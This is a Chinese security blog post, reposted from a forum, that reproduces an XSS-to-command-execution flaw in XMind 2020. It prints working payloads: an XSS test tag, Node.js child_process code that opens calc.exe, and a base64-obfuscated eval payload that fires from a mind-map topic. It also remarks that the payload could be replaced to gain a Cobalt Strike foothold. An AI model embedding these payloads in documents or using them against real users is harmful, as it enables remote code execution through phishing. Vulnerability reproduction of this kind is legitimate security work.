Xmind 2020 XSS漏洞导致命令执行复现 - 可爱又迷人的反派角色

admin 2021年12月31日15:33:37评论78 views字数 666阅读2分13秒阅读模式

今天看到某数字云漏洞预警,但没给利用代码就.....于是跑去复现一下
XMind 是一个全功能的思维导图和头脑风暴软件,为激发灵感和创意而生。作为一款有效提升工作和生活效率的生产力工具,受到全球百千万用户的青睐。
下载地址:https://www.xmind.cn/
下载xmind2020最新版本
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色

一、Xss:
1、利用过程:
主题插入xss利用代码
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
在大纲页面触发
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
实现弹窗
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
2、利用代码:

<audio src=x onerror=confirm("casrc")>

二、命令执行:
1、利用过程:
主题插入命令执行利用代码
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
在大纲页面触发实现命令执行
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
触发弹出计算器

2、利用代码:
Xmind 2020 XSS漏洞导致命令执行复现 -  可爱又迷人的反派角色
通过nodejs调用执行系统命令打开计算器
require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout});});

<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

三、评价
实现过程简单,用户范围庞大(看了下实验室小伙伴电脑基本都有),危害严重(替换利用代码可实现cs上线等功能)。谨防钓鱼攻击。复现完毕~

BY:先知论坛

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日15:33:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Xmind 2020 XSS漏洞导致命令执行复现 - 可爱又迷人的反派角色https://cn-sec.com/archives/711928.html

发表评论

匿名网友 填写信息